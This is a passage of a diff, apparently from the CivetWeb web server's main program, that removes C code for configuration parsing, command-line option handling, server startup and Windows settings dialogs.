-					/* TODO: define what to do */
-				}
-				break;
-			case 'v':
-				d[0] = '\v';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 'x':
-				if (isxdigit(d[2]) && isxdigit(d[3])) {
-					d[0] = (char)((unsigned char)(hex2dec(d[2]) * 16
-					                              + hex2dec(d[3])));
-					memmove(d + 1, d + 4, strlen(d + 3));
-				} else {
-					/* Invalid esc sequence */
-					/* TODO: define what to do */
-				}
-				break;
-			case 'z':
-				d[0] = 0;
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case '\\':
-				d[0] = '\\';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case '\'':
-				d[0] = '\'';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case '\"':
-				d[0] = '\"';
-				memmove(d + 1, d + 2, strlen(d + 1));
-				break;
-			case 0:
-				if (d == p) {
-					/* Line is only \ */
-					free(p);
-					return NULL;
-				}
-			/* no break */
-			default:
-				/* invalid ESC sequence */
-				/* TODO: define what to do */
-				break;
-			}
-
-			/* Advance to next character */
-			d++;
-		}
-	}
-	return p;
-}
-#endif
-
-
-static const char *
-get_option(char **options, const char *option_name)
-{
-	int i = 0;
-	const char *opt_value = NULL;
-
-	/* TODO (low, api makeover): options should be an array of key-value-pairs,
-	 * like
-	 *     struct {const char * key, const char * value} options[]
-	 * but it currently is an array with
-	 *     options[2*i] = key, options[2*i + 1] = value
-	 * (probably with a MG_LEGACY_INTERFACE definition)
-	 */
-	while (options[2 * i] != NULL) {
-		if (strcmp(options[2 * i], option_name) == 0) {
-			opt_value = options[2 * i + 1];
-			break;
-		}
-		i++;
-	}
-	return opt_value;
-}
-
-
-static int
-set_option(char **options, const char *name, const char *value)
-{
-	int i, type;
-	const struct mg_option *default_options = mg_get_valid_options();
-	const char *multi_sep = NULL;
-
-	for (i = 0; main_config_options[i].name != NULL; i++) {
-		if (0 == strcmp(name, main_config_options[i].name)) {
-			/* This option is evaluated by main.c, not civetweb.c - just skip it
-			 * and return OK */
-			return 1;
-		}
-	}
-
-	type = CONFIG_TYPE_UNKNOWN;
-	for (i = 0; default_options[i].name != NULL; i++) {
-		if (!strcmp(default_options[i].name, name)) {
-			type = default_options[i].type;
-		}
-	}
-	switch (type) {
-	case CONFIG_TYPE_UNKNOWN:
-		/* unknown option */
-		return 0;
-	case CONFIG_TYPE_NUMBER:
-		/* integer number >= 0, e.g. number of threads */
-		if (atol(value) < 0) {
-			/* invalid number */
-			return 0;
-		}
-		break;
-	case CONFIG_TYPE_STRING:
-		/* any text */
-		break;
-	case CONFIG_TYPE_STRING_LIST:
-		/* list of text items, separated by , */
-		multi_sep = ",";
-		break;
-	case CONFIG_TYPE_STRING_MULTILINE:
-		/* lines of text, separated by carriage return line feed */
-		multi_sep = "\r\n";
-		break;
-	case CONFIG_TYPE_BOOLEAN:
-		/* boolean value, yes or no */
-		if ((0 != strcmp(value, "yes")) && (0 != strcmp(value, "no"))) {
-			/* invalid boolean */
-			return 0;
-		}
-		break;
-	case CONFIG_TYPE_FILE:
-	case CONFIG_TYPE_DIRECTORY:
-		/* TODO (low): check this option when it is set, instead of calling
-		 * verify_existence later */
-		break;
-	case CONFIG_TYPE_EXT_PATTERN:
-		/* list of patterns, separated by | */
-		multi_sep = "|";
-		break;
-	default:
-		die("Unknown option type - option %s", name);
-	}
-
-	for (i = 0; i < MAX_OPTIONS; i++) {
-		if (options[2 * i] == NULL) {
-			/* Option not set yet. Add new option */
-			options[2 * i] = sdup(name);
-			options[2 * i + 1] = sdup(value);
-			options[2 * i + 2] = NULL;
-			break;
-		} else if (!strcmp(options[2 * i], name)) {
-			if (multi_sep) {
-				/* Option already set. Overwrite */
-				char *s = malloc(strlen(options[2 * i + 1]) + strlen(multi_sep)
-				                 + strlen(value) + 1);
-				if (!s) {
-					die("Out of memory");
-				}
-				sprintf(s, "%s%s%s", options[2 * i + 1], multi_sep, value);
-				free(options[2 * i + 1]);
-				options[2 * i + 1] = s;
-			} else {
-				/* Option already set. Overwrite */
-				free(options[2 * i + 1]);
-				options[2 * i + 1] = sdup(value);
-			}
-			break;
-		}
-	}
-
-	if (i == MAX_OPTIONS) {
-		die("Too many options specified");
-	}
-
-	if (options[2 * i] == NULL) {
-		die("Out of memory");
-	}
-	if (options[2 * i + 1] == NULL) {
-		die("Illegal escape sequence, or out of memory");
-	}
-
-	/* option set correctly */
-	return 1;
-}
-
-
-static int
-read_config_file(const char *config_file, char **options)
-{
-	char line[MAX_CONF_FILE_LINE_SIZE], *p;
-	FILE *fp = NULL;
-	size_t i, j, line_no = 0;
-
-	/* Open the config file */
-	fp = fopen(config_file, "r");
-	if (fp == NULL) {
-		/* Failed to open the file. Keep errno for the caller. */
-		return 0;
-	}
-
-	/* Load config file settings first */
-	if (fp != NULL) {
-		fprintf(stderr, "Loading config file %s\n", config_file);
-
-		/* Loop over the lines in config file */
-		while (fgets(line, sizeof(line), fp) != NULL) {
-
-			if (!line_no && !memcmp(line, "\xEF\xBB\xBF", 3)) {
-				/* strip UTF-8 BOM */
-				p = line + 3;
-			} else {
-				p = line;
-			}
-			line_no++;
-
-			/* Ignore empty lines and comments */
-			for (i = 0; isspace(*(unsigned char *)&line[i]);)
-				i++;
-			if (p[i] == '#' || p[i] == '\0') {
-				continue;
-			}
-
-			/* Skip spaces, \r and \n at the end of the line */
-			for (j = strlen(line) - 1;
-			     isspace(*(unsigned char *)&line[j])
-			         || iscntrl(*(unsigned char *)&line[j]);)
-				line[j--] = 0;
-
-			/* Find the space character between option name and value */
-			for (j = i; !isspace(*(unsigned char *)&line[j]) && (line[j] != 0);)
-				j++;
-
-			/* Terminate the string - then the string at (line+i) contains the
-			 * option name */
-			line[j] = 0;
-			j++;
-
-			/* Trim additional spaces between option name and value - then
-			 * (line+j) contains the option value */
-			while (isspace(line[j])) {
-				j++;
-			}
-
-			/* Set option */
-			if (!set_option(options, line + i, line + j)) {
-				fprintf(stderr,
-				        "%s: line %d is invalid, ignoring it:\n %s",
-				        config_file,
-				        (int)line_no,
-				        p);
-			}
-		}
-
-		(void)fclose(fp);
-	}
-	return 1;
-}
-
-
-static void
-process_command_line_arguments(int argc, char *argv[], char **options)
-{
-	char *p;
-	size_t i, cmd_line_opts_start = 1;
-#ifdef CONFIG_FILE2
-	FILE *fp = NULL;
-#endif
-
-	/* Should we use a config file ? */
-	if ((argc > 1) && (argv[1] != NULL) && (argv[1][0] != '-')
-	    && (argv[1][0] != 0)) {
-		/* The first command line parameter is a config file name. */
-		snprintf(g_config_file_name,
-		         sizeof(g_config_file_name) - 1,
-		         "%s",
-		         argv[1]);
-		cmd_line_opts_start = 2;
-	} else if ((p = strrchr(argv[0], DIRSEP)) == NULL) {
-		/* No config file set. No path in arg[0] found.
-		 * Use default file name in the current path. */
-		snprintf(g_config_file_name,
-		         sizeof(g_config_file_name) - 1,
-		         "%s",
-		         CONFIG_FILE);
-	} else {
-		/* No config file set. Path to exe found in arg[0].
-		 * Use default file name next to the executable. */
-		snprintf(g_config_file_name,
-		         sizeof(g_config_file_name) - 1,
-		         "%.*s%c%s",
-		         (int)(p - argv[0]),
-		         argv[0],
-		         DIRSEP,
-		         CONFIG_FILE);
-	}
-	g_config_file_name[sizeof(g_config_file_name) - 1] = 0;
-
-#ifdef CONFIG_FILE2
-	fp = fopen(g_config_file_name, "r");
-
-	/* try alternate config file */
-	if (fp == NULL) {
-		fp = fopen(CONFIG_FILE2, "r");
-		if (fp != NULL) {
-			strcpy(g_config_file_name, CONFIG_FILE2);
-		}
-	}
-	if (fp != NULL) {
-		fclose(fp);
-	}
-#endif
-
-	/* read all configurations from a config file */
-	if (0 == read_config_file(g_config_file_name, options)) {
-		if (cmd_line_opts_start == 2) {
-			/* If config file was set in command line and open failed, die. */
-			/* Errno will still hold the error from fopen. */
-			die("Cannot open config file %s: %s",
-			    g_config_file_name,
-			    strerror(errno));
-		}
-		/* Otherwise: CivetWeb can work without a config file */
-	}
-
-	/* If we're under MacOS and started by launchd, then the second
-	   argument is process serial number, -psn_.....
-	   In this case, don't process arguments at all. */
-	if (argv[1] == NULL || memcmp(argv[1], "-psn_", 5) != 0) {
-		/* Handle command line flags.
-		   They override config file and default settings. */
-		for (i = cmd_line_opts_start; argv[i] != NULL; i += 2) {
-			if (argv[i][0] != '-' || argv[i + 1] == NULL) {
-				show_usage_and_exit(argv[0]);
-			}
-			if (!set_option(options, &argv[i][1], argv[i + 1])) {
-				fprintf(
-				    stderr,
-				    "command line option is invalid, ignoring it:\n %s %s\n",
-				    argv[i],
-				    argv[i + 1]);
-			}
-		}
-	}
-}
-
-
-static void
-init_server_name(int argc, const char *argv[])
-{
-	int i;
-	assert(sizeof(main_config_options) / sizeof(main_config_options[0])
-	       == NUM_MAIN_OPTIONS + 1);
-	assert((strlen(mg_version()) + 12) < sizeof(g_server_base_name));
-	snprintf(g_server_base_name,
-	         sizeof(g_server_base_name),
-	         "CivetWeb V%s",
-	         mg_version());
-
-	g_server_name = g_server_base_name;
-	for (i = 0; i < argc - 1; i++) {
-		if ((argv[i][0] == '-')
-		    && (0 == strcmp(argv[i] + 1,
-		                    main_config_options[OPTION_TITLE].name))) {
-			g_server_name = (const char *)(argv[i + 1]);
-		}
-	}
-
-	g_icon_name = NULL;
-	for (i = 0; i < argc - 1; i++) {
-		if ((argv[i][0] == '-')
-		    && (0 == strcmp(argv[i] + 1,
-		                    main_config_options[OPTION_ICON].name))) {
-			g_icon_name = (const char *)(argv[i + 1]);
-		}
-	}
-
-	g_website = "http://civetweb.github.io/civetweb/";
-	for (i = 0; i < argc - 1; i++) {
-		if ((argv[i][0] == '-')
-		    && (0 == strcmp(argv[i] + 1,
-		                    main_config_options[OPTION_WEBPAGE].name))) {
-			g_website = (const char *)(argv[i + 1]);
-		}
-	}
-}
-
-
-static void
-init_system_info(void)
-{
-	int len = mg_get_system_info(NULL, 0);
-	if (len > 0) {
-		g_system_info = (char *)malloc((unsigned)len + 1);
-		(void)mg_get_system_info(g_system_info, len + 1);
-	} else {
-		g_system_info = sdup("Not available");
-	}
-}
-
-
-static void
-free_system_info(void)
-{
-	free(g_system_info);
-}
-
-
-static int
-log_message(const struct mg_connection *conn, const char *message)
-{
-	const struct mg_context *ctx = mg_get_context(conn);
-	struct tuser_data *ud = (struct tuser_data *)mg_get_user_data(ctx);
-
-	fprintf(stderr, "%s\n", message);
-
-	if (ud->first_message == NULL) {
-		ud->first_message = sdup(message);
-	}
-
-	return 0;
-}
-
-
-static int
-is_path_absolute(const char *path)
-{
-#ifdef _WIN32
-	return path != NULL
-	       && ((path[0] == '\\' && path[1] == '\\') || /* UNC path, e.g.
-	                                                      \\server\dir */
-	           (isalpha(path[0]) && path[1] == ':'
-	            && path[2] == '\\')); /* E.g. X:\dir */
-#else
-	return path != NULL && path[0] == '/';
-#endif
-}
-
-
-static void
-verify_existence(char **options, const char *option_name, int must_be_dir)
-{
-	struct stat st;
-	const char *path = get_option(options, option_name);
-
-#ifdef _WIN32
-	wchar_t wbuf[1024];
-	char mbbuf[1024];
-	int len;
-
-	if (path) {
-		memset(wbuf, 0, sizeof(wbuf));
-		memset(mbbuf, 0, sizeof(mbbuf));
-		len = MultiByteToWideChar(CP_UTF8,
-		                          0,
-		                          path,
-		                          -1,
-		                          wbuf,
-		                          (int)sizeof(wbuf) / sizeof(wbuf[0]) - 1);
-		wcstombs(mbbuf, wbuf, sizeof(mbbuf) - 1);
-		path = mbbuf;
-		(void)len;
-	}
-#endif
-
-	if (path != NULL && (stat(path, &st) != 0
-	                     || ((S_ISDIR(st.st_mode) ? 1 : 0) != must_be_dir))) {
-		die("Invalid path for %s: [%s]: (%s). Make sure that path is either "
-		    "absolute, or it is relative to civetweb executable.",
-		    option_name,
-		    path,
-		    strerror(errno));
-	}
-}
-
-
-static void
-set_absolute_path(char *options[],
-                  const char *option_name,
-                  const char *path_to_civetweb_exe)
-{
-	char path[PATH_MAX] = "", absolute[PATH_MAX] = "";
-	const char *option_value;
-	const char *p;
-
-	/* Check whether option is already set */
-	option_value = get_option(options, option_name);
-
-	/* If option is already set and it is an absolute path,
-	   leave it as it is -- it's already absolute. */
-	if (option_value != NULL && !is_path_absolute(option_value)) {
-		/* Not absolute. Use the directory where civetweb executable lives
-		   be the relative directory for everything.
-		   Extract civetweb executable directory into path. */
-		if ((p = strrchr(path_to_civetweb_exe, DIRSEP)) == NULL) {
-			IGNORE_UNUSED_RESULT(getcwd(path, sizeof(path)));
-		} else {
-			snprintf(path,
-			         sizeof(path) - 1,
-			         "%.*s",
-			         (int)(p - path_to_civetweb_exe),
-			         path_to_civetweb_exe);
-			path[sizeof(path) - 1] = 0;
-		}
-
-		strncat(path, "/", sizeof(path) - strlen(path) - 1);
-		strncat(path, option_value, sizeof(path) - strlen(path) - 1);
-
-		/* Absolutize the path, and set the option */
-		IGNORE_UNUSED_RESULT(abs_path(path, absolute, sizeof(absolute)));
-		set_option(options, option_name, absolute);
-	}
-}
-
-
-#ifdef USE_LUA
-
-#include "civetweb_private_lua.h"
-
-#endif
-
-
-#ifdef USE_DUKTAPE
-
-#include "duktape.h"
-
-static int
-run_duktape(const char *file_name)
-{
-	duk_context *ctx = NULL;
-
-	ctx = duk_create_heap_default();
-	if (!ctx) {
-		fprintf(stderr, "Failed to create a Duktape heap.\n");
-		goto finished;
-	}
-
-	if (duk_peval_file(ctx, file_name) != 0) {
-		fprintf(stderr, "%s\n", duk_safe_to_string(ctx, -1));
-		goto finished;
-	}
-	duk_pop(ctx); /* ignore result */
-
-finished:
-	duk_destroy_heap(ctx);
-
-	return 0;
-}
-#endif
-
-
-#if defined(__MINGW32__) || defined(__MINGW64__)
-/* For __MINGW32/64_MAJOR/MINOR_VERSION define */
-#include <_mingw.h>
-#endif
-
-
-static void
-start_civetweb(int argc, char *argv[])
-{
-	struct mg_callbacks callbacks;
-	char *options[2 * MAX_OPTIONS + 1];
-	int i;
-
-	/* Start option -I:
-	 * Show system information and exit
-	 * This is very useful for diagnosis. */
-	if (argc > 1 && !strcmp(argv[1], "-I")) {
-
-#ifdef WIN32
-		(void)MakeConsole();
-#endif
-		fprintf(stdout,
-		        "\n%s (%s)\n%s\n",
-		        g_server_base_name,
-		        g_server_name,
-		        g_system_info);
-
-		exit(EXIT_SUCCESS);
-	}
-
-	/* Edit passwords file: Add user or change password, if -A option is
-	 * specified */
-	if (argc > 1 && !strcmp(argv[1], "-A")) {
-		if (argc != 6) {
-			show_usage_and_exit(argv[0]);
-		}
-		exit(mg_modify_passwords_file(argv[2], argv[3], argv[4], argv[5])
-		         ? EXIT_SUCCESS
-		         : EXIT_FAILURE);
-	}
-
-	/* Edit passwords file: Remove user, if -R option is specified */
-	if (argc > 1 && !strcmp(argv[1], "-R")) {
-		if (argc != 5) {
-			show_usage_and_exit(argv[0]);
-		}
-		exit(mg_modify_passwords_file(argv[2], argv[3], argv[4], NULL)
-		         ? EXIT_SUCCESS
-		         : EXIT_FAILURE);
-	}
-
-	/* Call Lua with additional CivetWeb specific Lua functions, if -L option
-	 * is specified */
-	if (argc > 1 && !strcmp(argv[1], "-L")) {
-
-#ifdef USE_LUA
-		if (argc != 3) {
-			show_usage_and_exit(argv[0]);
-		}
-#ifdef WIN32
-		(void)MakeConsole();
-#endif
-		exit(run_lua(argv[2]));
-#else
-		show_server_name();
-		fprintf(stderr, "\nError: Lua support not enabled\n");
-		exit(EXIT_FAILURE);
-#endif
-	}
-
-	/* Call Duktape, if -E option is specified */
-	if (argc > 1 && !strcmp(argv[1], "-E")) {
-
-#ifdef USE_DUKTAPE
-		if (argc != 3) {
-			show_usage_and_exit(argv[0]);
-		}
-#ifdef WIN32
-		(void)MakeConsole();
-#endif
-		exit(run_duktape(argv[2]));
-#else
-		show_server_name();
-		fprintf(stderr, "\nError: Ecmascript support not enabled\n");
-		exit(EXIT_FAILURE);
-#endif
-	}
-
-	/* Show usage if -h or --help options are specified */
-	if (argc == 2 && (!strcmp(argv[1], "-h") || !strcmp(argv[1], "-H")
-	                  || !strcmp(argv[1], "--help"))) {
-		show_usage_and_exit(argv[0]);
-	}
-
-	options[0] = NULL;
-	set_option(options, "document_root", ".");
-
-	/* Update config based on command line arguments */
-	process_command_line_arguments(argc, argv, options);
-
-	/* Make sure we have absolute paths for files and directories */
-	set_absolute_path(options, "document_root", argv[0]);
-	set_absolute_path(options, "put_delete_auth_file", argv[0]);
-	set_absolute_path(options, "cgi_interpreter", argv[0]);
-	set_absolute_path(options, "access_log_file", argv[0]);
-	set_absolute_path(options, "error_log_file", argv[0]);
-	set_absolute_path(options, "global_auth_file", argv[0]);
-#ifdef USE_LUA
-	set_absolute_path(options, "lua_preload_file", argv[0]);
-#endif
-	set_absolute_path(options, "ssl_certificate", argv[0]);
-
-	/* Make extra verification for certain options */
-	verify_existence(options, "document_root", 1);
-	verify_existence(options, "cgi_interpreter", 0);
-	verify_existence(options, "ssl_certificate", 0);
-	verify_existence(options, "ssl_ca_path", 1);
-	verify_existence(options, "ssl_ca_file", 0);
-#ifdef USE_LUA
-	verify_existence(options, "lua_preload_file", 0);
-#endif
-
-	/* Setup signal handler: quit on Ctrl-C */
-	signal(SIGTERM, signal_handler);
-	signal(SIGINT, signal_handler);
-
-	/* Initialize user data */
-	memset(&g_user_data, 0, sizeof(g_user_data));
-
-	/* Start Civetweb */
-	memset(&callbacks, 0, sizeof(callbacks));
-	callbacks.log_message = &log_message;
-	g_ctx = mg_start(&callbacks, &g_user_data, (const char **)options);
-
-	/* mg_start copies all options to an internal buffer.
-	 * The options data field here is not required anymore. */
-	for (i = 0; options[i] != NULL; i++) {
-		free(options[i]);
-	}
-
-	/* If mg_start fails, it returns NULL */
-	if (g_ctx == NULL) {
-		die("Failed to start %s:\n%s",
-		    g_server_name,
-		    ((g_user_data.first_message == NULL) ? "unknown reason"
-		                                         : g_user_data.first_message));
-	}
-}
-
-
-static void
-stop_civetweb(void)
-{
-	mg_stop(g_ctx);
-	free(g_user_data.first_message);
-	g_user_data.first_message = NULL;
-}
-
-
-#ifdef _WIN32
-/* Win32 has a small GUI.
- * Define some GUI elements and Windows message handlers. */
-
-enum {
-	ID_ICON = 100,
-	ID_QUIT,
-	ID_SETTINGS,
-	ID_SEPARATOR,
-	ID_INSTALL_SERVICE,
-	ID_REMOVE_SERVICE,
-	ID_STATIC,
-	ID_GROUP,
-	ID_PASSWORD,
-	ID_SAVE,
-	ID_RESET_DEFAULTS,
-	ID_RESET_FILE,
-	ID_RESET_ACTIVE,
-	ID_STATUS,
-	ID_CONNECT,
-	ID_ADD_USER,
-	ID_ADD_USER_NAME,
-	ID_ADD_USER_REALM,
-	ID_INPUT_LINE,
-	ID_SYSINFO,
-	ID_WEBSITE,
-
-	/* All dynamically created text boxes for options have IDs starting from
-   ID_CONTROLS, incremented by one. */
-	ID_CONTROLS = 200,
-
-	/* Text boxes for files have "..." buttons to open file browser. These
-   buttons have IDs that are ID_FILE_BUTTONS_DELTA higher than associated
-   text box ID. */
-	ID_FILE_BUTTONS_DELTA = 1000
-};
-
-
-static HICON hIcon;
-static SERVICE_STATUS ss;
-static SERVICE_STATUS_HANDLE hStatus;
-static const char *service_magic_argument = "--";
-static NOTIFYICONDATA TrayIcon;
-
-static void WINAPI
-ControlHandler(DWORD code)
-{
-	if (code == SERVICE_CONTROL_STOP || code == SERVICE_CONTROL_SHUTDOWN) {
-		ss.dwWin32ExitCode = 0;
-		ss.dwCurrentState = SERVICE_STOPPED;
-	}
-	SetServiceStatus(hStatus, &ss);
-}
-
-
-static void WINAPI
-ServiceMain(void)
-{
-	ss.dwServiceType = SERVICE_WIN32;
-	ss.dwCurrentState = SERVICE_RUNNING;
-	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
-
-	hStatus = RegisterServiceCtrlHandler(g_server_name, ControlHandler);
-	SetServiceStatus(hStatus, &ss);
-
-	while (ss.dwCurrentState == SERVICE_RUNNING) {
-		Sleep(1000);
-	}
-	stop_civetweb();
-
-	ss.dwCurrentState = SERVICE_STOPPED;
-	ss.dwWin32ExitCode = (DWORD)-1;
-	SetServiceStatus(hStatus, &ss);
-}
-
-
-static void
-show_error(void)
-{
-	char buf[256];
-	FormatMessage(FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS,
-	              NULL,
-	              GetLastError(),
-	              MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
-	              buf,
-	              sizeof(buf),
-	              NULL);
-	MessageBox(NULL, buf, "Error", MB_OK);
-}
-
-
-static void *
-align(void *ptr, uintptr_t alig)
-{
-	uintptr_t ul = (uintptr_t)ptr;
-	ul += alig;
-	ul &= ~alig;
-	return ((void *)ul);
-}
-
-
-static void
-save_config(HWND hDlg, FILE *fp)
-{
-	char value[2000] = "";
-	const char *default_value;
-	const struct mg_option *options;
-	int i, id;
-
-	fprintf(fp, "%s", config_file_top_comment);
-	options = mg_get_valid_options();
-	for (i = 0; options[i].name != NULL; i++) {
-		id = ID_CONTROLS + i;
-		if (options[i].type == CONFIG_TYPE_BOOLEAN) {
-			snprintf(value,
-			         sizeof(value) - 1,
-			         "%s",
-			         IsDlgButtonChecked(hDlg, id) ? "yes" : "no");
-			value[sizeof(value) - 1] = 0;
-		} else {
-			GetDlgItemText(hDlg, id, value, sizeof(value));
-		}
-		default_value =
-		    options[i].default_value == NULL ? "" : options[i].default_value;
-		/* If value is the same as default, skip it */
-		if (strcmp(value, default_value) != 0) {
-			fprintf(fp, "%s %s\n", options[i].name, value);
-		}
-	}
-}
-
-
-/* LPARAM pointer passed to WM_INITDIALOG */
-struct dlg_proc_param {
-	int guard;
-	HWND hWnd;
-	const char *name;
-	char *buffer;
-	unsigned buflen;
-	int idRetry;
-	BOOL (*fRetry)(struct dlg_proc_param *data);
-};
-
-
-/* Dialog proc for settings dialog */
-static INT_PTR CALLBACK
-SettingsDlgProc(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
-{
-	FILE *fp;
-	int i, j;
-	const char *name, *value;
-	const struct mg_option *default_options = mg_get_valid_options();
-	char *file_options[MAX_OPTIONS * 2 + 1] = {0};
-	char *title;
-	struct dlg_proc_param *pdlg_proc_param;
-
-	switch (msg) {
-
-	case WM_CLOSE:
-		DestroyWindow(hDlg);
-		break;
-
-	case WM_COMMAND:
-		switch (LOWORD(wParam)) {
-
-		case ID_SAVE:
-			EnableWindow(GetDlgItem(hDlg, ID_SAVE), FALSE);
-			if ((fp = fopen(g_config_file_name, "w+")) != NULL) {
-				save_config(hDlg, fp);
-				fclose(fp);
-				stop_civetweb();
-				start_civetweb(__argc, __argv);
-			}
-			EnableWindow(GetDlgItem(hDlg, ID_SAVE), TRUE);
-			break;
-
-		case ID_RESET_DEFAULTS:
-			for (i = 0; default_options[i].name != NULL; i++) {
-				name = default_options[i].name;
-				value = default_options[i].default_value == NULL
-				            ? ""
-				            : default_options[i].default_value;
-				if (default_options[i].type == CONFIG_TYPE_BOOLEAN) {
-					CheckDlgButton(hDlg,
-					               ID_CONTROLS + i,
-					               !strcmp(value, "yes") ? BST_CHECKED
-					                                     : BST_UNCHECKED);
-				} else {
-					SetWindowText(GetDlgItem(hDlg, ID_CONTROLS + i), value);
-				}
-			}
-			break;
-
-		case ID_RESET_FILE:
-			read_config_file(g_config_file_name, file_options);
-			for (i = 0; default_options[i].name != NULL; i++) {
-				name = default_options[i].name;
-				value = default_options[i].default_value;
-				for (j = 0; file_options[j * 2] != NULL; j++) {
-					if (!strcmp(name, file_options[j * 2])) {
-						value = file_options[j * 2 + 1];
-					}
-				}
-				if (value == NULL) {
-					value = "";
-				}
-				if (default_options[i].type == CONFIG_TYPE_BOOLEAN) {
-					CheckDlgButton(hDlg,
-					               ID_CONTROLS + i,
-					               !strcmp(value, "yes") ? BST_CHECKED
-					                                     : BST_UNCHECKED);
-				} else {
-					SetWindowText(GetDlgItem(hDlg, ID_CONTROLS + i), value);
-				}
-			}
-			for (i = 0; i < MAX_OPTIONS; i++) {
-				free(file_options[2 * i]);
-				free(file_options[2 * i + 1]);
-			}
-			break;
-
-		case ID_RESET_ACTIVE:
-			for (i = 0; default_options[i].name != NULL; i++) {
-				name = default_options[i].name;
-				value = mg_get_option(g_ctx, name);
-				if (default_options[i].type == CONFIG_TYPE_BOOLEAN) {
-					CheckDlgButton(hDlg,
-					               ID_CONTROLS + i,
-					               !strcmp(value, "yes") ? BST_CHECKED
-					                                     : BST_UNCHECKED);
-				} else {
-					SetDlgItemText(hDlg,
-					               ID_CONTROLS + i,
-					               value == NULL ? "" : value);
-				}
-			}
-			break;
-		}
-
-		for (i = 0; default_options[i].name != NULL; i++) {
-			name = default_options[i].name;
-			if (((default_options[i].type == CONFIG_TYPE_FILE)
-			     || (default_options[i].type == CONFIG_TYPE_DIRECTORY))
-			    && LOWORD(wParam) == ID_CONTROLS + i + ID_FILE_BUTTONS_DELTA) {
-				OPENFILENAME of;
-				BROWSEINFO bi;
-				char path[PATH_MAX] = "";
-
-				memset(&of, 0, sizeof(of));
-				of.lStructSize = sizeof(of);
-				of.hwndOwner = (HWND)hDlg;
-				of.lpstrFile = path;
-				of.nMaxFile = sizeof(path);
-				of.lpstrInitialDir = mg_get_option(g_ctx, "document_root");
-				of.Flags =
-				    OFN_CREATEPROMPT | OFN_NOCHANGEDIR | OFN_HIDEREADONLY;
-
-				memset(&bi, 0, sizeof(bi));
-				bi.hwndOwner = (HWND)hDlg;
-				bi.lpszTitle = "Choose WWW root directory:";
-				bi.ulFlags = BIF_RETURNONLYFSDIRS;
-
-				if (default_options[i].type == CONFIG_TYPE_DIRECTORY) {
-					SHGetPathFromIDList(SHBrowseForFolder(&bi), path);
-				} else {
-					GetOpenFileName(&of);
-				}
-
-				if (path[0] != '\0') {
-					SetWindowText(GetDlgItem(hDlg, ID_CONTROLS + i), path);
-				}
-			}
-		}
-		break;
-
-	case WM_INITDIALOG:
-		/* Store hWnd in a parameter accessible by the parent, so we can
-		 * bring this window to front if required. */
-		pdlg_proc_param = (struct dlg_proc_param *)lParam;
-		pdlg_proc_param->hWnd = hDlg;
-
-		/* Initialize the dialog elements */
-		SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_SMALL, (LPARAM)hIcon);
-		SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_BIG, (LPARAM)hIcon);
-		title = (char *)malloc(strlen(g_server_name) + 16);
-		if (title) {
-			strcpy(title, g_server_name);
-			strcat(title, " settings");
-			SetWindowText(hDlg, title);
-			free(title);
-		}
-		SetFocus(GetDlgItem(hDlg, ID_SAVE));
-
-		/* Init dialog with active settings */
-		SendMessage(hDlg, WM_COMMAND, ID_RESET_ACTIVE, 0);
-		/* alternative: SendMessage(hDlg, WM_COMMAND, ID_RESET_FILE, 0); */
-		break;
-
-	default:
-		break;
-	}
-
-	return FALSE;
-}
-
-
-/* Dialog proc for input dialog */
-static INT_PTR CALLBACK
-InputDlgProc(HWND hDlg, UINT msg, WPARAM wParam, LPARAM lParam)
-{
-	static struct dlg_proc_param *inBuf = 0;
-	WORD ctrlId;
-	HWND hIn;
-
-	switch (msg) {
-	case WM_CLOSE:
-		inBuf = 0;
-		DestroyWindow(hDlg);
-		break;
-
-	case WM_COMMAND:
-		ctrlId = LOWORD(wParam);
-		if (ctrlId == IDOK) {
-			/* Get handle of input line */
-			hIn = GetDlgItem(hDlg, ID_INPUT_LINE);
-
-			if (hIn) {
-				/* Get content of input line */
-				GetWindowText(hIn, inBuf->buffer, (int)inBuf->buflen);
-				if (strlen(inBuf->buffer) > 0) {
-					/* Input dialog is not empty. */
-					EndDialog(hDlg, IDOK);
-				}
-			} else {
-				/* There is no input line in this dialog. */
-				EndDialog(hDlg, IDOK);
-			}
-
-		} else if (ctrlId == IDRETRY) {
-
-			/* Get handle of input line */
-			hIn = GetDlgItem(hDlg, inBuf->idRetry);
-
-			if (hIn) {
-				/* Load current string */
-				GetWindowText(hIn, inBuf->buffer, (int)inBuf->buflen);
-				if (inBuf->fRetry) {
-					if (inBuf->fRetry(inBuf)) {
-						SetWindowText(hIn, inBuf->buffer);
-					}
-				}
-			}
-
-		} else if (ctrlId == IDCANCEL) {
-			EndDialog(hDlg, IDCANCEL);
-		}
-		break;
-
-	case WM_INITDIALOG:
-		/* Get handle of input line */
-		hIn = GetDlgItem(hDlg, ID_INPUT_LINE);
-
-		/* Get dialog parameters */
-		inBuf = (struct dlg_proc_param *)lParam;
-
-		/* Set dialog handle for the caller */
-		inBuf->hWnd = hDlg;
-
-		/* Set dialog name */
-		SetWindowText(hDlg, inBuf->name);
-
-		if (hIn) {
-			/* This is an input dialog */
-			assert(inBuf != NULL);
-			assert((inBuf->buffer != NULL) && (inBuf->buflen != 0));
-			assert(strlen(inBuf->buffer) < inBuf->buflen);
-			SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_SMALL, (LPARAM)hIcon);
-			SendMessage(hDlg, WM_SETICON, (WPARAM)ICON_BIG, (LPARAM)hIcon);
-			SendMessage(hIn, EM_LIMITTEXT, inBuf->buflen - 1, 0);
-			SetWindowText(hIn, inBuf->buffer);
-			SetFocus(hIn);
-		}
-
-		break;
-
-	default:
-		break;
-	}
-
-	return FALSE;
-}
-
-
-static void
-suggest_passwd(char *passwd)
-{
-	unsigned u;
-	char *p;
-	union {
-		FILETIME ft;
-		LARGE_INTEGER li;
-	} num;
-
-	/* valid characters are 32 to 126 */
-	GetSystemTimeAsFileTime(&num.ft);
-	num.li.HighPart |= (LONG)GetCurrentProcessId();
-	p = passwd;
-	while (num.li.QuadPart) {
-		u = (unsigned)(num.li.QuadPart % 95);
-		num.li.QuadPart -= u;
-		num.li.QuadPart /= 95;
